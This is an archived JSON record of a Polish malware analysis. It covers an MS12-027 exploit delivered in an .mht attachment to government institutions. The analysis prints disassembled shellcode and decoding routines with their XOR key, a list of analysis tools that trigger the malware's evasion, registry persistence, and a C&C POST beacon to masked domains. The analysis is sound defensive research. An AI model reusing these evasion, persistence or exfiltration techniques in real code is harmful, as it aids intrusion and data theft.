{
	"id": "a9aeb389-7824-41c7-918b-65f33ba61bb2",
	"created_at": "2026-04-06T00:13:00.084426Z",
	"updated_at": "2026-04-10T03:20:05.62207Z",
	"deleted_at": null,
	"sha1_hash": "886a03eba2ef3553bbcda46c9ead6222760ece73",
	"title": "mht, MS12-27 oraz *malware*.info",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 147623,
	"plain_text": "mht, MS12-27 oraz *malware*.info\r\nArchived: 2026-04-02 11:19:10 UTC\r\nPrzedstawiamy skrócony opis z analizy złośliwego oprogramowania rozsyłanego do instytucji rządowych. Plik\r\nzałączany do wiadomości email miał rozszerzenie mht (MD5: D3DE5B8500453107D6D152B3C8506935).\r\nPoniżej fragment zawartości pliku. CLSID związany jest z błędem przepełnienia bufora w kontrolce ActiveX –\r\nMSCOMCTL.OCX (MS12-27).\r\nWyodrębniony obiekt ocxstg001.mso po odkodowaniu base64 zawiera exploit:\r\nW pliku mht można też zidentyfikować inny shellcode, którego celem jest między innymi zapisanie w TMP i\r\nuruchomienie kolejnej instancji WinWord.exe z nowym (podstawionym) plikiem - MH17.doc (treść dokumentu\r\ndotyczy katastrofy MH17) oraz wywołanie biblioteki DLL. Bibliotekę możemy również wyodrębnić samodzielnie\r\nz pliku mht.\r\nFragment drugiego shellcode:\r\nseg000:000001E9                 cld\r\nseg000:000001EA                 rep movsb\r\nseg000:000001EC                 mov     [edx+0A4h], edi\r\nseg000:000001F2                 mov     eax, [edx+20h]\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 1 of 9\n\nseg000:000001F5                 push    0\r\nseg000:000001FA                 push    0\r\nseg000:000001FF                 push    2\r\nseg000:00000204                 push    0\r\nseg000:00000209                 push    0\r\nseg000:0000020E                 push    4\r\nseg000:00000213                 mov     ebx, [edx+8Ch]\r\nseg000:00000219                 push    ebx\r\nseg000:0000021A                 call    eax\r\n \r\nW efekcie po wykorzystaniu podatności na komputerze ofiary w katalogu TMP tworzone są dwa pliki:\r\nMH17.doc\r\nInstalator złośliwego oprogramowania (DLL) w.q – MD5: 16A6C56BA458EC718B4E9BC8F9F10785\r\nBiblioteka DLL oprócz standardowej funkcji DllEntryPoint() eksportuje dwie dodatkowe funkcje Start() oraz\r\nStart717(void*). Start717 na początku wykonuje sprawdzenia czy system operacyjny nie jest \"monitorowany\" i\r\ndopiero wtedy \"instaluje\" jedną z dwóch bibliotek głównych.\r\nWiększość danych statycznych (komendy, nazwy funkcji, nazwy plików) w analizowanej bibliotece jest\r\nzakodowana.\r\nFragment kodu wywołujący funkcję odkodowującą dane poniżej:\r\n.text:70891190 sub_70891190 proc near       ; CODE XREF: Start717(void *)+59p\r\n.text:70891190 push    esi\r\n.text:70891191 push    edi\r\n.text:70891192 push    offset unk_7089B000             ; klucz\r\n.text:70891197 push    0\r\n.text:70891199 push    99h                  ; ilość danych do odkodowania\r\n.text:7089119E push    offset LibFileName\r\n.text:708911A3 mov     esi, ecx\r\n.text:708911A5 call    odkoduj_1            ; odkoduj nazwy funkcji i bibliotek\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 2 of 9\n\n.text:708911AA push    offset unk_7089B000             ; klucz\r\n.text:708911AF push    0\r\n.text:708911B1 push    2E6h                    ; ilość danych do odkodowania\r\n.text:708911B6 push    offset word_7089B0A8\r\n.text:708911BB call    odkoduj_1                       ; odkoduj nazwy procesow\r\n.text:708911C0 mov     edi, ds:LoadLibraryA\r\n.text:708911C6 push    offset LibFileName              ; lpLibFileName\r\n.text:708911CB call    edi ; LoadLibraryA\r\n.text:708911CD push    offset aIboq4i                  ; \"msvcrt.dll\"\r\n.text:708911D2 mov     [esi], eax\r\n.text:708911D4 call    edi ; LoadLibraryA\r\n.text:708911D6 mov     [esi+4], eax\r\n.text:708911D9 pop     edi\r\n.text:708911DA mov     eax, esi\r\n.text:708911DC pop     esi\r\n.text:708911DD retn\r\n.text:708911DD sub_70891190 endp\r\n Poniższy fragment kodu odpowiada za odkodowanie nazw bibliotek, funkcji i aplikacji \"monitorujących\". Użyty\r\nklucz FE95279A46B28136.\r\n.text:70891076 mov     dl, byte ptr [ebp+arg_4+3]\r\n.text:70891079\r\n.text:70891079 loc_70891079:                   ; CODE XREF: sub_70891000+70j\r\n.text:70891079 add     dl, cl\r\n.text:7089107B lea     ebx, [edi+eax+2]\r\n.text:7089107F and     ebx, 7\r\n.text:70891082 xor     dl, [ebx+esi]  ;pozycja w tablicy xor kolejny znak klucza\r\n.text:70891085 lea     ebx, [edi+eax+1]\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 3 of 9\n\n.text:70891089 and     ebx, 7\r\n.text:7089108C and     dl, [ebx+esi]\r\n.text:7089108F inc     ecx\r\n.text:70891090 mov     bl, dl\r\n.text:70891092 lea     edx, [esi+edi-1]\r\n.text:70891096 movzx   edx, byte ptr [edx+eax]\r\n.text:7089109A imul    edx, eax\r\n.text:7089109D add     edi, eax\r\n.text:7089109F shr     edx, 7\r\n.text:708910A2 and     edi, 7\r\n.text:708910A5 xor     dl, [edi+esi]\r\n.text:708910A8 mov     edi, [ebp+var_8]\r\n.text:708910AB add     bl, dl\r\n.text:708910AD mov     edx, [ebp+arg_0]\r\n.text:708910B0 xor     [edx+eax], bl                        ;odkodowany znak\r\n.text:708910B3 inc     eax\r\n.text:708910B4 cmp     ecx, 8                                     ;dł klucza\r\n.text:708910B7 jb      short loc_70891076\r\nOdkodowana pierwsza część danych:\r\n \r\nPoniżej lista aplikacji po wykryciu których malware kończy działanie:\r\nnetsniffer.exe\r\nwindump.exe\r\nwinapioverride32.exe\r\ntcpview.exe\r\nvboxservice.exe\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 4 of 9\n\nprocexp.exe\r\nwireshark.exe\r\nregmon.exe\r\nprocmon.exe\r\niris.exe\r\npetools.exe\r\nfilemon.exe\r\nvboxtray.exe\r\ntcpdump.exe\r\napimonitor.exe\r\nodb.exe\r\napispy32.exe\r\ncomview.exe\r\nwinspy.exe\r\nvmtools.exe\r\nvmwaretray.exe\r\nimmunitydebugger.exe\r\nsyser.exe\r\ndumpcap.exe\r\nvmwareuser.exe\r\nollydbg.exe\r\nwindbg.exe\r\nidag.exe\r\nKolejna zastosowana metoda wykrywania debuggera polega na dwukrotnym wywołaniu funkcji GetTickCount().\r\nJeśli różnica w zwracanej wartości jest zbyt duża – zwracana wartość 1 powoduję wyłączenie malware.\r\n.text:70891394 mov     esi, eax\r\n.text:70891396 call    ebx                             ; GetTickCount\r\n.text:70891398 push    eax\r\n.text:70891399 call    [ebp+var_4]                     ; srand\r\n.text:7089139C add     esp, 4\r\n.text:7089139F call    esi                             ; rand\r\n.text:708913A1 call    ebx                             ; GetTickCount\r\n.text:708913A3 mov     [ebp+var_4], eax\r\n.text:708913A6 mov     edi, 186A0h\r\n.text:708913AB jmp     short loc_708913B0\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 5 of 9\n\n.text:708913B0 loc_708913B0:                     ; CODE XREF: sub_70891360+4Bj\r\n.text:708913B0                                         ; sub_70891360+55j\r\n.text:708913B0 call    esi                             ; rand\r\n.text:708913B2 call    esi                             ; rand\r\n.text:708913B4 dec     edi\r\n.text:708913B5 jnz     short loc_708913B0\r\n.text:708913B7 call    ebx                             ; GetTickCount\r\n.text:708913B9 sub     eax, [ebp+var_4]\r\n.text:708913BC pop     edi\r\n.text:708913BD cmp     eax, 14h                        ; porównaj rezultat\r\n.text:708913C0 sbb     eax, eax\r\nJeśli uruchomiony kod nie wykryje nic podejrzanego na stacji roboczej instalowane jest złośliwe\r\noprogramowanie:\r\nW katalogu C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Microsoft\\Windows tworzy kolejny plik – coreshell.dll\r\n(MD5: 48656A93F9BA39410763A2196AABC67F)\r\nDo rejestrów dodawany jest klucz HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CoreShell z\r\nzawartością: “RUNDLL32.exe „C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Local\\Microsoft\\Windows\\coreshell.dll”,#1\r\nJeśli instalator ma uprawnienia lokalnego administratora to również utworzy:\r\nHKLM\\Software\\Classes\\CLSID\\{ EF7652A4-98EF-5031-226B-11456C96A7EA }\\INProcServer32\r\nwskazując na  coreshell.dll oraz funkcję Applicate()\r\nZłośliwe oprogramowanie ma zaimplementowany mechanizm zdalnego wykonywania komend oraz pobierania i\r\nuruchamiania plików. Jednym z pierwszych czynności jest pobranie z serwera C\u0026C kolejnej biblioteki:\r\nadvstoreshell.dll (MD5: D7A625779DF56D874871BB632F3E3106). Inny instalowany (dodawany do klucza\r\nRUN) na stacji roboczej plik to: conhost.dll (MD5:  5F69014A482DC115A93A80A486BB2842).\r\nDo serwerów C\u0026C wysyłane są też informacje o zainfekowanym hoście (np. wynik systeminfo) czy\r\nuruchomionych procesach. Zebranie informacje przed wysłaniem są szyfrowanie (wykonywany dwa razy XOR na\r\nróżnych pozycjach klucza i indeksie tablicy z danymi do zakodowania) oraz kodowane do base64. Klucz ma\r\ndługość 6 bajtów. \r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 6 of 9\n\nPróbka zebranych informacji:\r\n[System Process] ID:0 Path:00000057\r\nSystem ID:4 Path:00000005\r\nsmss.exe ID:272 Path:00000005\r\ncsrss.exe ID:364 Path:00000005\r\nwininit.exe ID:404 Path:00000005\r\ncsrss.exe ID:416 Path:00000005\r\nservices.exe ID:456 Path:00000005\r\nlsass.exe ID:496 Path:00000005\r\nlsm.exe ID:504 Path:00000005\r\nwinlogon.exe ID:512 Path:00000005\r\nsvchost.exe ID:632 Path:00000005\r\nsvchost.exe ID:696 Path:00000005\r\nsvchost.exe ID:744 Path:00000005\r\nsvchost.exe ID:832 Path:00000005\r\nsvchost.exe ID:904 Path:00000005\r\nsvchost.exe ID:1040 Path:00000005\r\nsvchost.exe ID:1124 Path:00000005\r\nspoolsv.exe ID:1304 Path:00000005\r\ndwm.exe ID:1328 Path:C:\\Windows\\system32\\Dwm.exe\r\nexplorer.exe ID:1352 Path:C:\\Windows\\Explorer.EXE\r\n…\r\nI ich zakodowana wersja:\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 7 of 9\n\nPOST /check/ HTTP/1.1\r\nUser-Agent: MSIE 8.0\r\nHost: malware*****.info\r\nContent-Length: 3408\r\nPragma: no-cache\r\nPmBn4Hb4AFtG5m/pFF4A7Uny/WJR43fbM0U/6WDEOVAKvLdUHlQiws1hQXdGyZlG\r\nQ3osvz0zdYZ1wjJAe3kDyCHNt2xmHuI1Qm8MJZM+JWsJG5wvCB5LHr0YLxFTJMcB\r\nASUH+r8qRBA9AeebBgNzB9iHfBdR+teMIgpaAO95KzX/Vx2GpDkJXWGTuDwAYy/4\r\nlC/vVh3k+CuWXGLV8C6yY3P+5jEEOVbnt9ROPA1Qq+CsMnhhgeO6OHJKdcaCPyEy\r\n3crElSPfz9WamErMu/jAnho50PyXlAM+rP/nmwArjfrPcWI70O71dCQkWuGbei0t\r\n…\r\nPrzy każdym zapytaniu POST wysyłanym do serwera C\u0026C generowany jest nowy klucz „sesji” i dołączany do\r\nprzesyłanej wiadomości.\r\nPrzesyłane wiadomości są oznaczane nagłówkami np. crtf (błędy), strtf (log) czy mtfs (informacje). Inne\r\nznaczniki wykorzystywane przez malware to ldrt, virt, crth, extc.\r\nNazwy funkcji i bibliotek w pamięci przechowywane są w formie zaszyfrowanej oraz w odwrotnej kolejności.\r\nPrzed pobraniem adresu funkcji na krótko przywracana jest właściwa kolejność znaków aby następnie wywołać\r\nGetProcAddress().\r\nDane o większym rozmiarze są najpierw kompresowane za pomocą LZW a następnie szyfrowane algorytmem\r\n3DES. Poniżej parametry wywołania funkcji CryptGenKey:\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 8 of 9\n\nOraz przykładowy klucz wykorzystany do szyfrowania przesyłanych plików. Pliki w formie zaszyfrowanej\r\nznajdują się w katalogu TMP (np. __2315tmp.dat) zainfekowanego użytkownika:\r\nMalware łączy się serwerem za pomocą http. Wykorzystuje ustawienia proxy. Poniżej lista aktywnych serwerów:\r\n****malware.info \r\nmalware*****.info\r\n********-update.org\r\n****service24.net\r\n*******-update.com\r\nSource: http://malware.prevenity.com/2014/08/malware-info.html\r\nhttp://malware.prevenity.com/2014/08/malware-info.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "PL",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"http://malware.prevenity.com/2014/08/malware-info.html"
	],
	"report_names": [
		"malware-info.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434380,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/886a03eba2ef3553bbcda46c9ead6222760ece73.pdf",
		"text": "https://archive.orkl.eu/886a03eba2ef3553bbcda46c9ead6222760ece73.txt",
		"img": "https://archive.orkl.eu/886a03eba2ef3553bbcda46c9ead6222760ece73.jpg"
	}
}